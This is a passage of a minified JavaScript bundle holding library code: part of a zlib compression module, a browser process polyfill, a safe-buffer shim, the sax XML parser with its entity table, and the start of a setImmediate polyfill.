Ve.opt_len+=3*(ze+1)+5+5+4,ze}(Ae),(qe=Ae.static_len+3+7>>>3)<=(Be=Ae.opt_len+3+7>>>3)&&(Be=qe)):Be=qe=Xe+5,Xe+4<=Be&&-1!==Ue?Ie(Ae,Ue,Xe,He):4===Ae.strategy||qe===Be?(l(Ae,2+(He?1:0),3),h(Ae,D,w)):(l(Ae,4+(He?1:0),3),function(Ve,ze,me,Ke){var rt;for(l(Ve,ze-257,5),l(Ve,me-1,5),l(Ve,Ke-4,4),rt=0;rt<Ke;rt++)l(Ve,Ve.bl_tree[2*p[rt]+1],3);Z(Ve,Ve.dyn_ltree,ze-1),Z(Ve,Ve.dyn_dtree,me-1)}(Ae,Ae.l_desc.max_code+1,Ae.d_desc.max_code+1,De+1),h(Ae,Ae.dyn_ltree,Ae.dyn_dtree)),P(Ae),He&&G(Ae)},F._tr_tally=function(Ae,Ue,Xe){return Ae.pending_buf[Ae.d_buf+2*Ae.last_lit]=Ue>>>8&255,Ae.pending_buf[Ae.d_buf+2*Ae.last_lit+1]=255&Ue,Ae.pending_buf[Ae.l_buf+Ae.last_lit]=255&Xe,Ae.last_lit++,0===Ue?Ae.dyn_ltree[2*Xe]++:(Ae.matches++,Ue--,Ae.dyn_ltree[2*(S[Xe]+256+1)]++,Ae.dyn_dtree[2*ye(Ue)]++),Ae.last_lit===Ae.lit_bufsize-1},F._tr_align=function(Ae){var Ue;l(Ae,2,3),f(Ae,256,D),16===(Ue=Ae).bi_valid?(z(Ue,Ue.bi_buf),Ue.bi_buf=0,Ue.bi_valid=0):Ue.bi_valid>=8&&(Ue.pending_buf[Ue.pending++]=255&Ue.bi_buf,Ue.bi_buf>>=8,Ue.bi_valid-=8)}},2292:Q=>{"use strict";Q.exports=function(){this.input=null,this.next_in=0,this.avail_in=0,this.total_in=0,this.output=null,this.next_out=0,this.avail_out=0,this.total_out=0,this.msg="",this.state=null,this.data_type=2,this.adler=0}},4155:Q=>{var F,E,g=Q.exports={};function b(){throw new Error("setTimeout has not been defined")}function _(){throw new Error("clearTimeout has not been defined")}function y(K){if(F===setTimeout)return setTimeout(K,0);if((F===b||!F)&&setTimeout)return F=setTimeout,setTimeout(K,0);try{return F(K,0)}catch(ee){try{return F.call(null,K,0)}catch(se){return F.call(this,K,0)}}}!function(){try{F="function"==typeof setTimeout?setTimeout:b}catch(K){F=b}try{E="function"==typeof clearTimeout?clearTimeout:_}catch(K){E=_}}();var M,p=[],D=!1,w=-1;function x(){D&&M&&(D=!1,M.length?p=M.concat(p):w=-1,p.length&&S())}function S(){if(!D){var K=y(x);D=!0;for(var ee=p.length;ee;){for(M=p,p=[];++w<ee;)M&&M[w].run();w=-1,ee=p.length}M=null,D=!1,function(se){if(E===clearTimeout)return clearTimeout(se);if((E===_||!E)&&clearTimeout)return E=clearTimeout,clearTimeout(se);try{E(se)}catch(ve){try{return E.call(null,se)}catch(le){return E.call(this,se)}}}(K)}}function O(K,ee){this.fun=K,this.array=ee}function U(){}g.nextTick=function(K){var ee=new Array(arguments.length-1);if(arguments.length>1)for(var se=1;se<arguments.length;se++)ee[se-1]=arguments[se];p.push(new O(K,ee)),1!==p.length||D||y(S)},O.prototype.run=function(){this.fun.apply(null,this.array)},g.title="browser",g.browser=!0,g.env={},g.argv=[],g.version="",g.versions={},g.on=U,g.addListener=U,g.once=U,g.off=U,g.removeListener=U,g.removeAllListeners=U,g.emit=U,g.prependListener=U,g.prependOnceListener=U,g.listeners=function(K){return[]},g.binding=function(K){throw new Error("process.binding is not supported")},g.cwd=function(){return"/"},g.chdir=function(K){throw new Error("process.chdir is not supported")},g.umask=function(){return 0}},9509:(Q,F,E)=>{var g=E(8764),b=g.Buffer;function _(M,p){for(var D in M)p[D]=M[D]}function y(M,p,D){return b(M,p,D)}b.from&&b.alloc&&b.allocUnsafe&&b.allocUnsafeSlow?Q.exports=g:(_(g,F),F.Buffer=y),_(b,y),y.from=function(M,p,D){if("number"==typeof M)throw new TypeError("Argument must not be a number");return b(M,p,D)},y.alloc=function(M,p,D){if("number"!=typeof M)throw new TypeError("Argument must be a number");var w=b(M);return void 0!==p?"string"==typeof D?w.fill(p,D):w.fill(p):w.fill(0),w},y.allocUnsafe=function(M){if("number"!=typeof M)throw new TypeError("Argument must be a number");return b(M)},y.allocUnsafeSlow=function(M){if("number"!=typeof M)throw new TypeError("Argument must be a number");return g.SlowBuffer(M)}},6099:(Q,F,E)=>{!function(g){g.parser=function(qe,De){return new y(qe,De)},g.SAXParser=y,g.SAXStream=p,g.createStream=function(qe,De){return new p(qe,De)},g.MAX_BUFFER_LENGTH=65536;var b,_=["comment","sgmlDecl","textNode","tagName","doctype","procInstName","procInstBody","entity","attribName","attribValue","cdata","script"];function y(qe,De){if(!(this instanceof y))return new y(qe,De);var Ve=this;(function(ze){for(var me=0,Ke=_.length;me<Ke;me++)ze[_[me]]=""})(Ve),Ve.q=Ve.c="",Ve.bufferCheckPosition=g.MAX_BUFFER_LENGTH,Ve.opt=De||{},Ve.opt.lowercase=Ve.opt.lowercase||Ve.opt.lowercasetags,Ve.looseCase=Ve.opt.lowercase?"toLowerCase":"toUpperCase",Ve.tags=[],Ve.closed=Ve.closedRoot=Ve.sawRoot=!1,Ve.tag=Ve.error=null,Ve.strict=!!qe,Ve.noscript=!(!qe&&!Ve.opt.noscript),Ve.state=A.BEGIN,Ve.strictEntities=Ve.opt.strictEntities,Ve.ENTITIES=Object.create(Ve.strictEntities?g.XML_ENTITIES:g.ENTITIES),Ve.attribList=[],Ve.opt.xmlns&&(Ve.ns=Object.create(x)),Ve.trackPosition=!1!==Ve.opt.position,Ve.trackPosition&&(Ve.position=Ve.line=Ve.column=0),P(Ve,"onready")}g.EVENTS=["text","processinginstruction","sgmldeclaration","doctype","comment","opentagstart","attribute","opentag","closetag","opencdata","cdata","closecdata","error","end","ready","script","opennamespace","closenamespace"],Object.create||(Object.create=function(qe){function De(){}return De.prototype=qe,new De}),Object.keys||(Object.keys=function(qe){var De=[];for(var Ve in qe)qe.hasOwnProperty(Ve)&&De.push(Ve);return De}),y.prototype={end:function(){R(this)},write:function(qe){var De=this;if(this.error)throw this.error;if(De.closed)return h(De,"Cannot write after close. Assign an onready handler.");if(null===qe)return R(De);"object"==typeof qe&&(qe=qe.toString());for(var Ve=0,ze="";ze=Be(qe,Ve++),De.c=ze,ze;)switch(De.trackPosition&&(De.position++,"\n"===ze?(De.line++,De.column=0):De.column++),De.state){case A.BEGIN:if(De.state=A.BEGIN_WHITESPACE,"\ufeff"===ze)continue;He(De,ze);continue;case A.BEGIN_WHITESPACE:He(De,ze);continue;case A.TEXT:if(De.sawRoot&&!De.closedRoot){for(var me=Ve-1;ze&&"<"!==ze&&"&"!==ze;)(ze=Be(qe,Ve++))&&De.trackPosition&&(De.position++,"\n"===ze?(De.line++,De.column=0):De.column++);De.textNode+=qe.substring(me,Ve-1)}"<"!==ze||De.sawRoot&&De.closedRoot&&!De.strict?(ee(ze)||De.sawRoot&&!De.closedRoot||J(De,"Text data outside of root node."),"&"===ze?De.state=A.TEXT_ENTITY:De.textNode+=ze):(De.state=A.OPEN_WAKA,De.startTagPosition=De.position);continue;case A.SCRIPT:"<"===ze?De.state=A.SCRIPT_ENDING:De.script+=ze;continue;case A.SCRIPT_ENDING:"/"===ze?De.state=A.CLOSE_TAG:(De.script+="<"+ze,De.state=A.SCRIPT);continue;case A.OPEN_WAKA:"!"===ze?(De.state=A.SGML_DECL,De.sgmlDecl=""):ee(ze)||(le(S,ze)?(De.state=A.OPEN_TAG,De.tagName=ze):"/"===ze?(De.state=A.CLOSE_TAG,De.tagName=""):"?"===ze?(De.state=A.PROC_INST,De.procInstName=De.procInstBody=""):(J(De,"Unencoded <"),De.startTagPosition+1<De.position&&(ze=new Array(De.position-De.startTagPosition).join(" ")+ze),De.textNode+="<"+ze,De.state=A.TEXT));continue;case A.SGML_DECL:"[CDATA["===(De.sgmlDecl+ze).toUpperCase()?(G(De,"onopencdata"),De.state=A.CDATA,De.sgmlDecl="",De.cdata=""):De.sgmlDecl+ze==="--"?(De.state=A.COMMENT,De.comment="",De.sgmlDecl=""):"DOCTYPE"===(De.sgmlDecl+ze).toUpperCase()?(De.state=A.DOCTYPE,(De.doctype||De.sawRoot)&&J(De,"Inappropriately located doctype declaration"),De.doctype="",De.sgmlDecl=""):">"===ze?(G(De,"onsgmldeclaration",De.sgmlDecl),De.sgmlDecl="",De.state=A.TEXT):(se(ze)&&(De.state=A.SGML_DECL_QUOTED),De.sgmlDecl+=ze);continue;case A.SGML_DECL_QUOTED:ze===De.q&&(De.state=A.SGML_DECL,De.q=""),De.sgmlDecl+=ze;continue;case A.DOCTYPE:">"===ze?(De.state=A.TEXT,G(De,"ondoctype",De.doctype),De.doctype=!0):(De.doctype+=ze,"["===ze?De.state=A.DOCTYPE_DTD:se(ze)&&(De.state=A.DOCTYPE_QUOTED,De.q=ze));continue;case A.DOCTYPE_QUOTED:De.doctype+=ze,ze===De.q&&(De.q="",De.state=A.DOCTYPE);continue;case A.DOCTYPE_DTD:De.doctype+=ze,"]"===ze?De.state=A.DOCTYPE:se(ze)&&(De.state=A.DOCTYPE_DTD_QUOTED,De.q=ze);continue;case A.DOCTYPE_DTD_QUOTED:De.doctype+=ze,ze===De.q&&(De.state=A.DOCTYPE_DTD,De.q="");continue;case A.COMMENT:"-"===ze?De.state=A.COMMENT_ENDING:De.comment+=ze;continue;case A.COMMENT_ENDING:"-"===ze?(De.state=A.COMMENT_ENDED,De.comment=L(De.opt,De.comment),De.comment&&G(De,"oncomment",De.comment),De.comment=""):(De.comment+="-"+ze,De.state=A.COMMENT);continue;case A.COMMENT_ENDED:">"!==ze?(J(De,"Malformed comment"),De.comment+="--"+ze,De.state=A.COMMENT):De.state=A.TEXT;continue;case A.CDATA:"]"===ze?De.state=A.CDATA_ENDING:De.cdata+=ze;continue;case A.CDATA_ENDING:"]"===ze?De.state=A.CDATA_ENDING_2:(De.cdata+="]"+ze,De.state=A.CDATA);continue;case A.CDATA_ENDING_2:">"===ze?(De.cdata&&G(De,"oncdata",De.cdata),G(De,"onclosecdata"),De.cdata="",De.state=A.TEXT):"]"===ze?De.cdata+="]":(De.cdata+="]]"+ze,De.state=A.CDATA);continue;case A.PROC_INST:"?"===ze?De.state=A.PROC_INST_ENDING:ee(ze)?De.state=A.PROC_INST_BODY:De.procInstName+=ze;continue;case A.PROC_INST_BODY:if(!De.procInstBody&&ee(ze))continue;"?"===ze?De.state=A.PROC_INST_ENDING:De.procInstBody+=ze;continue;case A.PROC_INST_ENDING:">"===ze?(G(De,"onprocessinginstruction",{name:De.procInstName,body:De.procInstBody}),De.procInstName=De.procInstBody="",De.state=A.TEXT):(De.procInstBody+="?"+ze,De.state=A.PROC_INST_BODY);continue;case A.OPEN_TAG:le(O,ze)?De.tagName+=ze:(Z(De),">"===ze?Ae(De):"/"===ze?De.state=A.OPEN_TAG_SLASH:(ee(ze)||J(De,"Invalid character in tag name"),De.state=A.ATTRIB));continue;case A.OPEN_TAG_SLASH:">"===ze?(Ae(De,!0),Ue(De)):(J(De,"Forward-slash in opening tag not followed by >"),De.state=A.ATTRIB);continue;case A.ATTRIB:if(ee(ze))continue;">"===ze?Ae(De):"/"===ze?De.state=A.OPEN_TAG_SLASH:le(S,ze)?(De.attribName=ze,De.attribValue="",De.state=A.ATTRIB_NAME):J(De,"Invalid attribute name");continue;case A.ATTRIB_NAME:"="===ze?De.state=A.ATTRIB_VALUE:">"===ze?(J(De,"Attribute without value"),De.attribValue=De.attribName,Ie(De),Ae(De)):ee(ze)?De.state=A.ATTRIB_NAME_SAW_WHITE:le(O,ze)?De.attribName+=ze:J(De,"Invalid attribute name");continue;case A.ATTRIB_NAME_SAW_WHITE:if("="===ze)De.state=A.ATTRIB_VALUE;else{if(ee(ze))continue;J(De,"Attribute without value"),De.tag.attributes[De.attribName]="",De.attribValue="",G(De,"onattribute",{name:De.attribName,value:""}),De.attribName="",">"===ze?Ae(De):le(S,ze)?(De.attribName=ze,De.state=A.ATTRIB_NAME):(J(De,"Invalid attribute name"),De.state=A.ATTRIB)}continue;case A.ATTRIB_VALUE:if(ee(ze))continue;se(ze)?(De.q=ze,De.state=A.ATTRIB_VALUE_QUOTED):(J(De,"Unquoted attribute value"),De.state=A.ATTRIB_VALUE_UNQUOTED,De.attribValue=ze);continue;case A.ATTRIB_VALUE_QUOTED:if(ze!==De.q){"&"===ze?De.state=A.ATTRIB_VALUE_ENTITY_Q:De.attribValue+=ze;continue}Ie(De),De.q="",De.state=A.ATTRIB_VALUE_CLOSED;continue;case A.ATTRIB_VALUE_CLOSED:ee(ze)?De.state=A.ATTRIB:">"===ze?Ae(De):"/"===ze?De.state=A.OPEN_TAG_SLASH:le(S,ze)?(J(De,"No whitespace between attributes"),De.attribName=ze,De.attribValue="",De.state=A.ATTRIB_NAME):J(De,"Invalid attribute name");continue;case A.ATTRIB_VALUE_UNQUOTED:if(!ve(ze)){"&"===ze?De.state=A.ATTRIB_VALUE_ENTITY_U:De.attribValue+=ze;continue}Ie(De),">"===ze?Ae(De):De.state=A.ATTRIB;continue;case A.CLOSE_TAG:if(De.tagName)">"===ze?Ue(De):le(O,ze)?De.tagName+=ze:De.script?(De.script+="</"+De.tagName,De.tagName="",De.state=A.SCRIPT):(ee(ze)||J(De,"Invalid tagname in closing tag"),De.state=A.CLOSE_TAG_SAW_WHITE);else{if(ee(ze))continue;ye(S,ze)?De.script?(De.script+="</"+ze,De.state=A.SCRIPT):J(De,"Invalid tagname in closing tag."):De.tagName=ze}continue;case A.CLOSE_TAG_SAW_WHITE:if(ee(ze))continue;">"===ze?Ue(De):J(De,"Invalid characters in closing tag");continue;case A.TEXT_ENTITY:case A.ATTRIB_VALUE_ENTITY_Q:case A.ATTRIB_VALUE_ENTITY_U:var rt,Ge;switch(De.state){case A.TEXT_ENTITY:rt=A.TEXT,Ge="textNode";break;case A.ATTRIB_VALUE_ENTITY_Q:rt=A.ATTRIB_VALUE_QUOTED,Ge="attribValue";break;case A.ATTRIB_VALUE_ENTITY_U:rt=A.ATTRIB_VALUE_UNQUOTED,Ge="attribValue"}";"===ze?(De[Ge]+=Xe(De),De.entity="",De.state=rt):le(De.entity.length?K:U,ze)?De.entity+=ze:(J(De,"Invalid character in entity name"),De[Ge]+="&"+De.entity+ze,De.entity="",De.state=rt);continue;default:throw new Error(De,"Unknown state: "+De.state)}return De.position>=De.bufferCheckPosition&&function(Qe){for(var ht=Math.max(g.MAX_BUFFER_LENGTH,10),mt=0,lt=0,ft=_.length;lt<ft;lt++){var xe=Qe[_[lt]].length;if(xe>ht)switch(_[lt]){case"textNode":X(Qe);break;case"cdata":G(Qe,"oncdata",Qe.cdata),Qe.cdata="";break;case"script":G(Qe,"onscript",Qe.script),Qe.script="";break;default:h(Qe,"Max buffer length exceeded: "+_[lt])}mt=Math.max(mt,xe)}Qe.bufferCheckPosition=g.MAX_BUFFER_LENGTH-mt+Qe.position}(De),De},resume:function(){return this.error=null,this},close:function(){return this.write(null)},flush:function(){var qe;X(qe=this),""!==qe.cdata&&(G(qe,"oncdata",qe.cdata),qe.cdata=""),""!==qe.script&&(G(qe,"onscript",qe.script),qe.script="")}};try{b=E(2830).Stream}catch(qe){b=function(){}}var M=g.EVENTS.filter(function(qe){return"error"!==qe&&"end"!==qe});function p(qe,De){if(!(this instanceof p))return new p(qe,De);b.apply(this),this._parser=new y(qe,De),this.writable=!0,this.readable=!0;var Ve=this;this._parser.onend=function(){Ve.emit("end")},this._parser.onerror=function(ze){Ve.emit("error",ze),Ve._parser.error=null},this._decoder=null,M.forEach(function(ze){Object.defineProperty(Ve,"on"+ze,{get:function(){return Ve._parser["on"+ze]},set:function(me){if(!me)return Ve.removeAllListeners(ze),Ve._parser["on"+ze]=me,me;Ve.on(ze,me)},enumerable:!0,configurable:!1})})}(p.prototype=Object.create(b.prototype,{constructor:{value:p}})).write=function(qe){if("function"==typeof ie&&"function"==typeof ie.isBuffer&&ie.isBuffer(qe)){if(!this._decoder){var De=E(2553).s;this._decoder=new De("utf8")}qe=this._decoder.write(qe)}return this._parser.write(qe.toString()),this.emit("data",qe),!0},p.prototype.end=function(qe){return qe&&qe.length&&this.write(qe),this._parser.end(),!0},p.prototype.on=function(qe,De){var Ve=this;return Ve._parser["on"+qe]||-1===M.indexOf(qe)||(Ve._parser["on"+qe]=function(){var ze=1===arguments.length?[arguments[0]]:Array.apply(null,arguments);ze.splice(0,0,qe),Ve.emit.apply(Ve,ze)}),b.prototype.on.call(Ve,qe,De)};var D="http://www.w3.org/XML/1998/namespace",w="http://www.w3.org/2000/xmlns/",x={xml:D,xmlns:w},S=/[:_A-Za-z\u00C0-\u00D6\u00D8-\u00F6\u00F8-\u02FF\u0370-\u037D\u037F-\u1FFF\u200C-\u200D\u2070-\u218F\u2C00-\u2FEF\u3001-\uD7FF\uF900-\uFDCF\uFDF0-\uFFFD]/,O=/[:_A-Za-z\u00C0-\u00D6\u00D8-\u00F6\u00F8-\u02FF\u0370-\u037D\u037F-\u1FFF\u200C-\u200D\u2070-\u218F\u2C00-\u2FEF\u3001-\uD7FF\uF900-\uFDCF\uFDF0-\uFFFD\u00B7\u0300-\u036F\u203F-\u2040.\d-]/,U=/[#:_A-Za-z\u00C0-\u00D6\u00D8-\u00F6\u00F8-\u02FF\u0370-\u037D\u037F-\u1FFF\u200C-\u200D\u2070-\u218F\u2C00-\u2FEF\u3001-\uD7FF\uF900-\uFDCF\uFDF0-\uFFFD]/,K=/[#:_A-Za-z\u00C0-\u00D6\u00D8-\u00F6\u00F8-\u02FF\u0370-\u037D\u037F-\u1FFF\u200C-\u200D\u2070-\u218F\u2C00-\u2FEF\u3001-\uD7FF\uF900-\uFDCF\uFDF0-\uFFFD\u00B7\u0300-\u036F\u203F-\u2040.\d-]/;function ee(qe){return" "===qe||"\n"===qe||"\r"===qe||"\t"===qe}function se(qe){return'"'===qe||"'"===qe}function ve(qe){return">"===qe||ee(qe)}function le(qe,De){return qe.test(De)}function ye(qe,De){return!le(qe,De)}var z,l,f,A=0;for(var v in g.STATE={BEGIN:A++,BEGIN_WHITESPACE:A++,TEXT:A++,TEXT_ENTITY:A++,OPEN_WAKA:A++,SGML_DECL:A++,SGML_DECL_QUOTED:A++,DOCTYPE:A++,DOCTYPE_QUOTED:A++,DOCTYPE_DTD:A++,DOCTYPE_DTD_QUOTED:A++,COMMENT_STARTING:A++,COMMENT:A++,COMMENT_ENDING:A++,COMMENT_ENDED:A++,CDATA:A++,CDATA_ENDING:A++,CDATA_ENDING_2:A++,PROC_INST:A++,PROC_INST_BODY:A++,PROC_INST_ENDING:A++,OPEN_TAG:A++,OPEN_TAG_SLASH:A++,ATTRIB:A++,ATTRIB_NAME:A++,ATTRIB_NAME_SAW_WHITE:A++,ATTRIB_VALUE:A++,ATTRIB_VALUE_QUOTED:A++,ATTRIB_VALUE_CLOSED:A++,ATTRIB_VALUE_UNQUOTED:A++,ATTRIB_VALUE_ENTITY_Q:A++,ATTRIB_VALUE_ENTITY_U:A++,CLOSE_TAG:A++,CLOSE_TAG_SAW_WHITE:A++,SCRIPT:A++,SCRIPT_ENDING:A++},g.XML_ENTITIES={amp:"&",gt:">",lt:"<",quot:'"',apos:"'"},g.ENTITIES={amp:"&",gt:">",lt:"<",quot:'"',apos:"'",AElig:198,Aacute:193,Acirc:194,Agrave:192,Aring:197,Atilde:195,Auml:196,Ccedil:199,ETH:208,Eacute:201,Ecirc:202,Egrave:200,Euml:203,Iacute:205,Icirc:206,Igrave:204,Iuml:207,Ntilde:209,Oacute:211,Ocirc:212,Ograve:210,Oslash:216,Otilde:213,Ouml:214,THORN:222,Uacute:218,Ucirc:219,Ugrave:217,Uuml:220,Yacute:221,aacute:225,acirc:226,aelig:230,agrave:224,aring:229,atilde:227,auml:228,ccedil:231,eacute:233,ecirc:234,egrave:232,eth:240,euml:235,iacute:237,icirc:238,igrave:236,iuml:239,ntilde:241,oacute:243,ocirc:244,ograve:242,oslash:248,otilde:245,ouml:246,szlig:223,thorn:254,uacute:250,ucirc:251,ugrave:249,uuml:252,yacute:253,yuml:255,copy:169,reg:174,nbsp:160,iexcl:161,cent:162,pound:163,curren:164,yen:165,brvbar:166,sect:167,uml:168,ordf:170,laquo:171,not:172,shy:173,macr:175,deg:176,plusmn:177,sup1:185,sup2:178,sup3:179,acute:180,micro:181,para:182,middot:183,cedil:184,ordm:186,raquo:187,frac14:188,frac12:189,frac34:190,iquest:191,times:215,divide:247,OElig:338,oelig:339,Scaron:352,scaron:353,Yuml:376,fnof:402,circ:710,tilde:732,Alpha:913,Beta:914,Gamma:915,Delta:916,Epsilon:917,Zeta:918,Eta:919,Theta:920,Iota:921,Kappa:922,Lambda:923,Mu:924,Nu:925,Xi:926,Omicron:927,Pi:928,Rho:929,Sigma:931,Tau:932,Upsilon:933,Phi:934,Chi:935,Psi:936,Omega:937,alpha:945,beta:946,gamma:947,delta:948,epsilon:949,zeta:950,eta:951,theta:952,iota:953,kappa:954,lambda:955,mu:956,nu:957,xi:958,omicron:959,pi:960,rho:961,sigmaf:962,sigma:963,tau:964,upsilon:965,phi:966,chi:967,psi:968,omega:969,thetasym:977,upsih:978,piv:982,ensp:8194,emsp:8195,thinsp:8201,zwnj:8204,zwj:8205,lrm:8206,rlm:8207,ndash:8211,mdash:8212,lsquo:8216,rsquo:8217,sbquo:8218,ldquo:8220,rdquo:8221,bdquo:8222,dagger:8224,Dagger:8225,bull:8226,hellip:8230,permil:8240,prime:8242,Prime:8243,lsaquo:8249,rsaquo:8250,oline:8254,frasl:8260,euro:8364,image:8465,weierp:8472,real:8476,trade:8482,alefsym:8501,larr:8592,uarr:8593,rarr:8594,darr:8595,harr:8596,crarr:8629,lArr:8656,uArr:8657,rArr:8658,dArr:8659,hArr:8660,forall:8704,part:8706,exist:8707,empty:8709,nabla:8711,isin:8712,notin:8713,ni:8715,prod:8719,sum:8721,minus:8722,lowast:8727,radic:8730,prop:8733,infin:8734,ang:8736,and:8743,or:8744,cap:8745,cup:8746,int:8747,there4:8756,sim:8764,cong:8773,asymp:8776,ne:8800,equiv:8801,le:8804,ge:8805,sub:8834,sup:8835,nsub:8836,sube:8838,supe:8839,oplus:8853,otimes:8855,perp:8869,sdot:8901,lceil:8968,rceil:8969,lfloor:8970,rfloor:8971,lang:9001,rang:9002,loz:9674,spades:9824,clubs:9827,hearts:9829,diams:9830},Object.keys(g.ENTITIES).forEach(function(qe){var De=g.ENTITIES[qe],Ve="number"==typeof De?String.fromCharCode(De):De;g.ENTITIES[qe]=Ve}),g.STATE)g.STATE[g.STATE[v]]=v;function P(qe,De,Ve){qe[De]&&qe[De](Ve)}function G(qe,De,Ve){qe.textNode&&X(qe),P(qe,De,Ve)}function X(qe){qe.textNode=L(qe.opt,qe.textNode),qe.textNode&&P(qe,"ontext",qe.textNode),qe.textNode=""}function L(qe,De){return qe.trim&&(De=De.trim()),qe.normalize&&(De=De.replace(/\s+/g," ")),De}function h(qe,De){return X(qe),qe.trackPosition&&(De+="\nLine: "+qe.line+"\nColumn: "+qe.column+"\nChar: "+qe.c),De=new Error(De),qe.error=De,P(qe,"onerror",De),qe}function R(qe){return qe.sawRoot&&!qe.closedRoot&&J(qe,"Unclosed root tag"),qe.state!==A.BEGIN&&qe.state!==A.BEGIN_WHITESPACE&&qe.state!==A.TEXT&&h(qe,"Unexpected end"),X(qe),qe.c="",qe.closed=!0,P(qe,"onend"),y.call(qe,qe.strict,qe.opt),qe}function J(qe,De){if("object"!=typeof qe||!(qe instanceof y))throw new Error("bad call to strictFail");qe.strict&&h(qe,De)}function Z(qe){qe.strict||(qe.tagName=qe.tagName[qe.looseCase]());var De=qe.tags[qe.tags.length-1]||qe,Ve=qe.tag={name:qe.tagName,attributes:{}};qe.opt.xmlns&&(Ve.ns=De.ns),qe.attribList.length=0,G(qe,"onopentagstart",Ve)}function ue(qe,De){var Ve=qe.indexOf(":")<0?["",qe]:qe.split(":"),ze=Ve[0],me=Ve[1];return De&&"xmlns"===qe&&(ze="xmlns",me=""),{prefix:ze,local:me}}function Ie(qe){if(qe.strict||(qe.attribName=qe.attribName[qe.looseCase]()),-1!==qe.attribList.indexOf(qe.attribName)||qe.tag.attributes.hasOwnProperty(qe.attribName))qe.attribName=qe.attribValue="";else{if(qe.opt.xmlns){var De=ue(qe.attribName,!0),ze=De.local;if("xmlns"===De.prefix)if("xml"===ze&&qe.attribValue!==D)J(qe,"xml: prefix must be bound to "+D+"\nActual: "+qe.attribValue);else if("xmlns"===ze&&qe.attribValue!==w)J(qe,"xmlns: prefix must be bound to "+w+"\nActual: "+qe.attribValue);else{var me=qe.tag,Ke=qe.tags[qe.tags.length-1]||qe;me.ns===Ke.ns&&(me.ns=Object.create(Ke.ns)),me.ns[ze]=qe.attribValue}qe.attribList.push([qe.attribName,qe.attribValue])}else qe.tag.attributes[qe.attribName]=qe.attribValue,G(qe,"onattribute",{name:qe.attribName,value:qe.attribValue});qe.attribName=qe.attribValue=""}}function Ae(qe,De){if(qe.opt.xmlns){var Ve=qe.tag,ze=ue(qe.tagName);Ve.prefix=ze.prefix,Ve.local=ze.local,Ve.uri=Ve.ns[ze.prefix]||"",Ve.prefix&&!Ve.uri&&(J(qe,"Unbound namespace prefix: "+JSON.stringify(qe.tagName)),Ve.uri=ze.prefix),Ve.ns&&(qe.tags[qe.tags.length-1]||qe).ns!==Ve.ns&&Object.keys(Ve.ns).forEach(function(Je){G(qe,"onopennamespace",{prefix:Je,uri:Ve.ns[Je]})});for(var Ke=0,rt=qe.attribList.length;Ke<rt;Ke++){var Ge=qe.attribList[Ke],Qe=Ge[0],ht=Ge[1],mt=ue(Qe,!0),lt=mt.prefix,xe=""===lt?"":Ve.ns[lt]||"",We={name:Qe,value:ht,prefix:lt,local:mt.local,uri:xe};lt&&"xmlns"!==lt&&!xe&&(J(qe,"Unbound namespace prefix: "+JSON.stringify(lt)),We.uri=lt),qe.tag.attributes[Qe]=We,G(qe,"onattribute",We)}qe.attribList.length=0}qe.tag.isSelfClosing=!!De,qe.sawRoot=!0,qe.tags.push(qe.tag),G(qe,"onopentag",qe.tag),De||(qe.state=qe.noscript||"script"!==qe.tagName.toLowerCase()?A.TEXT:A.SCRIPT,qe.tag=null,qe.tagName=""),qe.attribName=qe.attribValue="",qe.attribList.length=0}function Ue(qe){if(!qe.tagName)return J(qe,"Weird empty close tag."),qe.textNode+="</>",void(qe.state=A.TEXT);if(qe.script){if("script"!==qe.tagName)return qe.script+="</"+qe.tagName+">",qe.tagName="",void(qe.state=A.SCRIPT);G(qe,"onscript",qe.script),qe.script=""}var De=qe.tags.length,Ve=qe.tagName;qe.strict||(Ve=Ve[qe.looseCase]());for(var ze=Ve;De--&&qe.tags[De].name!==ze;)J(qe,"Unexpected close tag");if(De<0)return J(qe,"Unmatched closing tag: "+qe.tagName),qe.textNode+="</"+qe.tagName+">",void(qe.state=A.TEXT);qe.tagName=Ve;for(var me=qe.tags.length;me-- >De;){var Ke=qe.tag=qe.tags.pop();qe.tagName=qe.tag.name,G(qe,"onclosetag",qe.tagName);var rt={};for(var Ge in Ke.ns)rt[Ge]=Ke.ns[Ge];qe.opt.xmlns&&Ke.ns!==(qe.tags[qe.tags.length-1]||qe).ns&&Object.keys(Ke.ns).forEach(function(ht){G(qe,"onclosenamespace",{prefix:ht,uri:Ke.ns[ht]})})}0===De&&(qe.closedRoot=!0),qe.tagName=qe.attribValue=qe.attribName="",qe.attribList.length=0,qe.state=A.TEXT}function Xe(qe){var De,Ve=qe.entity,ze=Ve.toLowerCase(),me="";return qe.ENTITIES[Ve]?qe.ENTITIES[Ve]:qe.ENTITIES[ze]?qe.ENTITIES[ze]:("#"===(Ve=ze).charAt(0)&&("x"===Ve.charAt(1)?(Ve=Ve.slice(2),me=(De=parseInt(Ve,16)).toString(16)):(Ve=Ve.slice(1),me=(De=parseInt(Ve,10)).toString(10))),Ve=Ve.replace(/^0+/,""),isNaN(De)||me.toLowerCase()!==Ve?(J(qe,"Invalid character entity"),"&"+qe.entity+";"):String.fromCodePoint(De))}function He(qe,De){"<"===De?(qe.state=A.OPEN_WAKA,qe.startTagPosition=qe.position):ee(De)||(J(qe,"Non-whitespace before first tag."),qe.textNode=De,qe.state=A.TEXT)}function Be(qe,De){var Ve="";return De<qe.length&&(Ve=qe.charAt(De)),Ve}A=g.STATE,String.fromCodePoint||(z=String.fromCharCode,l=Math.floor,f=function(){var qe,Ve=16384,ze=[],me=-1,Ke=arguments.length;if(!Ke)return"";for(var rt="";++me<Ke;){var Ge=Number(arguments[me]);if(!isFinite(Ge)||Ge<0||Ge>1114111||l(Ge)!==Ge)throw RangeError("Invalid code point: "+Ge);Ge<=65535?ze.push(Ge):(qe=55296+((Ge-=65536)>>10),ze.push(qe,Ge%1024+56320)),(me+1===Ke||ze.length>Ve)&&(rt+=z.apply(null,ze),ze.length=0)}return rt},Object.defineProperty?Object.defineProperty(String,"fromCodePoint",{value:f,configurable:!0,writable:!0}):String.fromCodePoint=f)}(F)},4889:function(Q,F,E){var g=E(4155);!function(b,_){"use strict";if(!b.setImmediate){var y,M,p,D,w,x=1,S={},O=!1,U=b.document,K=Object.getPrototypeOf&&Object.getPrototypeOf(b);K=K&&K.setTimeout?K:b,"[object process]"==={}.toString.call(b.process)?y=function(ve){g.nextTick(function(){se(ve)})}:function(){if(b.postMessage&&!b.importScripts){var ve=!0,le=b.onmessage;return b.onmessage=function(){ve=!1},b.postMessage("","*"),b.onmessage=le,ve}}()?(D="setImmediate$"+Math.random()+"$",w=function(ve){ve.source===b&&"string"==typeof 